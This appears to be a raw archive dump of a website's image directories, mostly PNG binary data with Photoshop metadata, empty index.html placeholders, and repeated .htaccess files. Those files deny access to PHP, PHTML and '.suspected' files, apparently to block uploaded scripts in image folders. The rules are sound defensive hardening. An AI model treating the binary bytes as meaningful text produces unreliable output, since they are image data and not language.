IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:1854918DC7F611E49C3AB8A160258EB4" xmpMM:DocumentID="xmp.did:1854918EC7F611E49C3AB8A160258EB4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1854918BC7F611E49C3AB8A160258EB4" stRef:documentID="xmp.did:1854918CC7F611E49C3AB8A160258EB4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>5'��IDATx��Y{L�u~�8��QH
h�c�
]����j����J��L�����\j�׌ܲ�m,ġ�f�.�j������	
(�.r5��ᜯ��}�9�p��90���.�y/�����e�]���/��3!��N�&�$T�N�}����
�ń�����"<�\�NpH@��K�	6_^�Uy=�	7/�p��]��~IB�^�<wԈ&*��&L�(,���:�߁���&�n."��,�)d�b�
K!�)�!c�Ⱥ�r:���ѵ�o|��@��cǃl��軄]x+ʄ�
X�F���F�d�sK0m�Z8l��D�$A3���ф抳(=�%�}=^-��e
(y:����#�����|��Yh�,��R#D�2%�<��߃��3�/�S�a�)���W��XFr����n����qtޯ�����woGZ���{n���3`ⳋ�3�x$K�̺4�'�,�g�7i
Ax�T�|�kh�zA����Q[�*��E����Ĺ�0�M��xWr�x|[\$>ޘ�쌅r�u]�F̵:#Zo]��̥*Z���69��(1Eٱͨ)܇9��^�u�]���s�A���$�BMVJv"�1�-¢pZ�bVC�(�\�I�/�U����W��K@͊��[t�$���a�*����Q_��ܝJ�Ir���e5��,��zw�\��-��$���<MS�`H�~��0y�J٢����8��8S�� ��[Wt͔P"�%�iզ�#�������A�f�iG��"��YȢ$-܀�CE#$j�oʺ���ņcK&��s3.'��J���3f5�Wb�S�D'�r�$	L��Iq�hgC��馁���Q����҉��r4Š=m�p����8F9tA��F�;�M�
e�z_�8N&�f�k�e��ST���؎��la]��|���z.�|`�j�r�t��K�~.�s�[k�T~����l���;*Y���֮�(~Ą�TB3�$�CbRq{�壸y�b�n��`g�5\�Z���
W�|6H��K��4��z?��g�}6,���2qf��'-�H2�)�ꃨ�˥����{�p��2���j�fk{#�? J����-��'��`a��]E[�ؓE&$"��r`�ז�z��*��w2�zz����X>���"�!�պ
|?i�9�^�7�P�~���N���Lo�;�>��0Q��h����}�����6�C��6g?z��y�m��w�s�ʮ�aN��-���s (�q�7h���I�
��'����m�myq�^Gc���ه��A������K(��e��<���^uM���nb�6d
�R�mw ]�Eʈ���Β�e��uB̭��^-�3��X�f{ZJ��#���ǐ��e�H.����,���%gq�ج��9^]�&�nO%�D)���86[�m@TZ��N��Oi�5�h߇c�Y"]��"Z͹�qK�H��Ջ-�bK������p�N�5�^7�B�Ć�6��|�-Yӊ��s���k���ێQ&l��F�۬�cH�'w�!��>o��`�YR���ecA�����b�����w$Um�Ϛ����H�n�&�� �ϩh��#XN�SN*'�m�!_~�٘'o��Ea�وd�����jwIMN|[�|E�KШ��9B���FjҞE2������#i5Q�0�vs�Q��#r���Pr�&.���������1!�i�2�p�V�V桟[&�D�
��n0�y����`�IEND�B`�images/09/.htaccess000044400000000424152434416630010045 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/09/02/index.html000060400000000042152434416630010457 0ustar00<!DOCTYPE html><title></title>
images/09/02/.htaccess000044400000000424152434416630010266 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/09/02/upload.png000060400000003507152434416630010465 0ustar00�PNG


IHDR) �oQ>tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35A9794A52A011E3A0DFEE45FEA3B7A2" xmpMM:DocumentID="xmp.did:35A9794B52A011E3A0DFEE45FEA3B7A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35A9794852A011E3A0DFEE45FEA3B7A2" stRef:documentID="xmp.did:35A9794952A011E3A0DFEE45FEA3B7A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATx��X�RAm.�x�\��R���=�I�|��O1b��UQAKEK��C-Vv]-�j�vaw�L���=c*
���<OD_x�P�X������7���Ҽ���Ũ���a���Q<�㓓3<�ha�\��=�P	��z?�L�T�����36���� 2�ͺ���b�;;;��������Y`���5]˻����t���	����8���q�=<<�<�kmM,��pC?�2�9	�����䠚���ҏ�jq8�L&񛃯{{{��C��5A����o擑���H�<���f��;?���q�X,�f�Z�n�Skk+���PSS��w1����GŊ���tRxp����PP"ϔ����zy����5�459)�Pi���1<L>��~�������2-A҃���@d}jwWx�%����"��&.�~;�&����E���hvf�\.��<
��P1�>uv��|>O[[[eFx\�^^^Ľ��~�'u�D��\\]]U�M�����F�T�
	P�K��jBl�H)B1@֗%
�����@�!����y����=����h�>���TW�+in0<����� gr����x��~�0���*J����АXL``�v���'�(�LR$���0*���fY�M(J �?8<��� ev��429���f��?=;+3��4)�btd�f�V��;�#.�/� 2�*�R�Jm����
N�D�Rme���PUm�lJ/C[�n^���Um�j�
�mӢ\�Q&�S��R[!�j|T�d�7P6�9$�D��c�hD�9T���t����*��IP�gp
�Hh�$����(C�NW�A�P�я��ټ!��<���rfx��Ր,��C�Bɺ���7�e��O1�!A��Zv����b|}��6�#��u>S��o�x��k ��ţ��.ж��!�IEND�B`�images/09/02/02.png000060400000002363152434416630007421 0ustar00�PNG


IHDR!"�p��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:81418687543D11E38025B0C2E49BCBCB" xmpMM:DocumentID="xmp.did:81418688543D11E38025B0C2E49BCBCB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81418685543D11E38025B0C2E49BCBCB" stRef:documentID="xmp.did:81418686543D11E38025B0C2E49BCBCB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>jy'�gIDATx�b|���q
[�432P��S >ċ�x�$#�#Āx)�0���h ~�0Ae������4�^�#@x9�3���
�� �
�k 9"�a`A<����!1���`b`���uĨ#FA�#��~2A�~	�1A�{	��1w�1�c@�l�j���T >Lg��o�Y��� �Ec�A�q�ڋ��E ���Ł�IN�y����/ �_�!��z`�O ތ�0\���hQbn�R"�-%���@<�<�;�F��#���(��8��h�_��{M,��г}
�G�G('�1���<������k@���A8���IEND�B`�images/09/01/index.html000060400000000042152434416630010456 0ustar00<!DOCTYPE html><title></title>
images/09/01/upload.png000060400000007652152434416630010471 0ustar00�PNG


IHDR) �oQ>	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F�IDATx�̘iLTg��;�# 8B�Z�Nu*ո��jUB
ֶ��%������&�VS��D[�bcB-�
�FE#.�8*(�,�:��,�!�!Ȍ`���1�~�s�=�=���t���X
�3t�5 ���tA�d�>z����ID��2�7�<䇴l
n�n4K��sv�|��Q�h&��
F	0$��t2w7h���W9��-H$B���/)scI��L*q�mȴ#W�u�R�s����rKgG�
����*7�~����wʧ��ip!�����|��$��~R����~=��a��߀�n��ɑ�%�}����
A"`�٩�5��fu��K��M��H��N'A���ӿ��P�2�������fK�Պ�
jȻz���JR?��R!s�ug���U3&З����(]Z{�T�n?uݒM��: |���?�C�p�����g�*(%3��:Sk���eH���15?!��H��[%^SȥL�gb�?3�Ƴn�QT5�:�_��ז ���#�i�\�Fi%��^%3���Z�h�mk��x-_v[�W-���-�ǃ�i�<w�qA~�r>QF2),��q���7�Y1����v ��&�e��+���%:mvޏ�Z�tr��
�R@ٓ�^u�QU#�f:_/$��f!-�V��6���
��V�W�;<ki��R��J<U����il#64$�e�݋�����E��;=�X�<���Q*'plv�'n05f,��?�I�Xg���K�$iz��`T5r�jY��b�b=J���gEq�����ٓ]��$=2����$ψ���~�[� uŋ�.�=�^����s�!~κ@E���K��{���a���jvd�s��ۚ���DM)VC~Z5�NA�����G=�p:�:]̩��L
!p�7v�����\�����	Q�Y�0^�׏�Ml�dKgGc���ۢ�Mm��|���[ͦ��Pȥ�U�-���V"C�7�\�zt/�;�e��&>NG����}�im��;��ا?�iɔ9��Tq��>
f�i�B&E.��n�aw8zu��)1cH�+B���9%�F��rA��2��ES�X45l����o �x�o�Ǯ3+~!:����\��5����y*�؝]08�Rۤ��
���f�F��-u�(z+�u� ��ϠB.K�aYb�Kk�u&�J	��q{���!�ڸ= M�j�m�j�����������{�~IEND�B`�images/09/01/02.png000060400000002423152434416630007415 0ustar00�PNG


IHDR$$���tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B9732860504011E38FD2FB8EB143152D" xmpMM:DocumentID="xmp.did:B9732861504011E38FD2FB8EB143152D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B973285E504011E38FD2FB8EB143152D" stRef:documentID="xmp.did:B973285F504011E38FD2FB8EB143152D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C��IDATx�b���?�`L�������rn@�Ė@,
ČT�O��/�]Ȓ���XCH�w�N b*9�jȼ������2��S@�B��sj/��@��@,O�d#�+`nAvP�PZ��@tEp�Gw��;��A� �AY0�:h�A�uШ������[~�;��;��������;h�;h:����r�r���,���1���?���� �Ec�����
��犖�
�x�A{�@̌�F�y��T�\@b��&�U@|gW)��!�	ě��Tq�K��@\J����8�Ҫ����u���]�eCG2����ȉ�^�M�w�Ă���@�����P>(�N�k�ʔ+@�@���
VD狗:�IEND�B`�images/09/01/.htaccess000044400000000424152434416630010265 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/09/checkbox.png000060400000002001152434416630010532 0ustar00�PNG


IHDR		�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:3E4E4B2F504F11E3B48690A1733E716F" xmpMM:DocumentID="xmp.did:3E4E4B30504F11E3B48690A1733E716F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3E4E4B2D504F11E3B48690A1733E716F" stRef:documentID="xmp.did:3E4E4B2E504F11E3B48690A1733E716F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��uIDATx�t�m
� D�)H@��$ 	H@�r�X��x$Mw�G�����
�sn/�1�唘f���C�����,���"��p^��ŽF����Z�HJ�Q���[ ��'��M���IEND�B`�images/09/03/index.html000060400000000042152434416630010460 0ustar00<!DOCTYPE html><title></title>
images/09/03/.htaccess000044400000000424152434416630010267 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/09/03/02.png000060400000002373152434416630007423 0ustar00�PNG


IHDR!"�p��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A4AA599C543E11E3B4918EF47638E0D2" xmpMM:DocumentID="xmp.did:A4AA599D543E11E3B4918EF47638E0D2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A4AA599A543E11E3B4918EF47638E0D2" stRef:documentID="xmp.did:A4AA599B543E11E3B4918EF47638E0D2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�<u�oIDATx�엻K�P�oRGg-(�����P��`7_���E]������A�*��8��cqp\TP'���ȉ�H mI�C~�A�9ɽ�=�3�jB�E(@8��|�����D�a�$���g9q�b'\�$`�Ε����ۤ�.ؗ�"0��N�0.��n\�O�πH�-K�]��Id�D&�I�#�a���ս��<��߳�3�ز,�)Uص$ {۪�:����@E���%�%�/���)i�_͏��֝p;�c����,���LB8���,NF�0$�5XO�yq��q$9��X�;=��?b\��)�%��X����&�	������6tm����H	�z��ܨ��5s0ۍ��K�D�?
���IEND�B`�images/09/03/upload.png000060400000003507152434416630010466 0ustar00�PNG


IHDR) �oQ>tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35A9794A52A011E3A0DFEE45FEA3B7A2" xmpMM:DocumentID="xmp.did:35A9794B52A011E3A0DFEE45FEA3B7A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35A9794852A011E3A0DFEE45FEA3B7A2" stRef:documentID="xmp.did:35A9794952A011E3A0DFEE45FEA3B7A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATx��X�RAm.�x�\��R���=�I�|��O1b��UQAKEK��C-Vv]-�j�vaw�L���=c*
���<OD_x�P�X������7���Ҽ���Ũ���a���Q<�㓓3<�ha�\��=�P	��z?�L�T�����36���� 2�ͺ���b�;;;��������Y`���5]˻����t���	����8���q�=<<�<�kmM,��pC?�2�9	�����䠚���ҏ�jq8�L&񛃯{{{��C��5A����o擑���H�<���f��;?���q�X,�f�Z�n�Skk+���PSS��w1����GŊ���tRxp����PP"ϔ����zy����5�459)�Pi���1<L>��~�������2-A҃���@d}jwWx�%����"��&.�~;�&����E���hvf�\.��<
��P1�>uv��|>O[[[eFx\�^^^Ľ��~�'u�D��\\]]U�M�����F�T�
	P�K��jBl�H)B1@֗%
�����@�!����y����=����h�>���TW�+in0<����� gr����x��~�0���*J����АXL``�v���'�(�LR$���0*���fY�M(J �?8<��� ev��429���f��?=;+3��4)�btd�f�V��;�#.�/� 2�*�R�Jm����
N�D�Rme���PUm�lJ/C[�n^���Um�j�
�mӢ\�Q&�S��R[!�j|T�d�7P6�9$�D��c�hD�9T���t����*��IP�gp
�Hh�$����(C�NW�A�P�я��ټ!��<���rfx��Ր,��C�Bɺ���7�e��O1�!A��Zv����b|}��6�#��u>S��o�x��k ��ţ��.ж��!�IEND�B`�images/09/index.html000060400000000042152434416630010236 0ustar00<!DOCTYPE html><title></title>
images/09/previous.png000060400000002154152434416630010631 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FA90D80759C111E3B4D69BC3BE0FC11B" xmpMM:DocumentID="xmp.did:FA90D80859C111E3B4D69BC3BE0FC11B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FA90D80559C111E3B4D69BC3BE0FC11B" stRef:documentID="xmp.did:FA90D80659C111E3B4D69BC3BE0FC11B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڴԭ
�P��m.�i�
lZ�=�~%����v�`�hj�4�y&� X48��38X;�_xV8{y� ,������Zf&����D��<��AW�oݥ6ʨ��*"7E�\ͅ�x��(I�&�l]S�-\QT���1���d#��v����FJ��a�NJ6R^���쥜5Q�)lE^�㠽4*��(�7)�i�Cg��b�9��8l���IEND�B`�images/09/next.png000060400000002212152434416630007726 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B73A48B759C211E39979E3976F1BB419" xmpMM:DocumentID="xmp.did:B73A48B859C211E39979E3976F1BB419"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B73A48B559C211E39979E3976F1BB419" stRef:documentID="xmp.did:B73A48B659C211E39979E3976F1BB419"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_W���IDATx�b,,,l���?��	��������@��q>���L �������}QQQ&>��R����_,,,����Z�Χ���Ȝ��\Q�e{3�������LȜɓ'�R�@.Ʃ.:���������N��fa�S��}����A�T�)(��Z�%1@^F�S����r~`���Q�ĉO��e����~���h�b`*݄ΧE>e����<���L�§:`,((��<���O�� �!�g�{�&IEND�B`�images/09/01.png000060400000002133152434416630007172 0ustar00�PNG


IHDR�6�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:51985863504E11E3A5F1D724919619F9" xmpMM:DocumentID="xmp.did:51985864504E11E3A5F1D724919619F9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51985861504E11E3A5F1D724919619F9" stRef:documentID="xmp.did:51985862504E11E3A5F1D724919619F9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�p�M�IDATx��1�0���`P"��1��O�MvAz�P��i#�o$\/�.��{!��k\�?X]�����OӤ�ڶ���e�e�N7M�(��q��� ���J��)�!�M��m�W��(�pm�eY.7��-C���ދ�s�5�:�w 
�	!_�N��(de6��q�u��Z_U��s���c�[�s\��&�'Lb�IEND�B`�images/lic_plus.png000060400000002321152434416630010333 0ustar00�PNG


IHDR�JL�tEXtSoftwareAdobe ImageReadyq�e<sIDATxڜ�mH[W�Ͻ7�ɢ�e���T����D�I:�����:kK�0��S���N��؏)2C��A;'�Uf�?:d+��9V��V�_1���&{Oz�$�4�^��{�9�}�q��Xe���	n/��a��.//?ioog�@�
��0g��JPH�BEQ`�b�Ѩ�N�s���e��rῇ��A�)�J%�h4H�T">����a��x���Z__�������===�t�$@��~^�P�VTT�����.��lhmmm����ڜ�`{ �[sQQ]UU�H�D����*������p���â��d���7�z�>g�V�*++�%%%Z[[Ŝ�$U/�ˏaKr�H�!�m�ɸ���b���


u�Ja�qsTMM
	��`4��$k�}�]z��/�p�L����ā$Q�����)?/�)S<��!���S�_y��nɵ��!�N�P���z,n��Xaaa�o(@�����s��>r�볗��_�V��T*-Mt&���Y�._���G;N������~>�8ؿo�����B.�E�lcs�zWu�߯��7��n��P��b1a2��Y�L�������᛺On����>2_��Kcd�:�a�M��"�b�H���C_4BꖍY����er��i?�aM�xY�ڗ�z\��~?�#7$-�	D�?�W~l6�����{{�ܧ��o*Ų�/.���LF>�/:::��Ko ����X�]s���{��_'�R=�=Q�w��/�fa}�Phsqq1��Hp��n����c�[��Ƒ���s���I���r=d����x����J�$凯�n�^~ܢ�+�� �2\\C���P`q�3q��Lļ^��j�ᦖN^R��L�	��_���>Lƚ�����������,�n[���57	�����h���Ɓ�	�-�����bA{
��.��cvwwG����@���K@+��-�b�`w=��l6?��p�5Z9��XC�u�i��������L	Y��n7V�����+++w:;;����o�',�����/��Bՠy<��DC�=�� �}}}K ᄘ0�=3��q@�-�db�L�#QVy�K}
�t�Kl�)@(A�s�u�	0�(��ʡ�IEND�B`�images/up_hover.png000060400000046635152434416630010370 0ustar00�PNG


IHDR��R	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
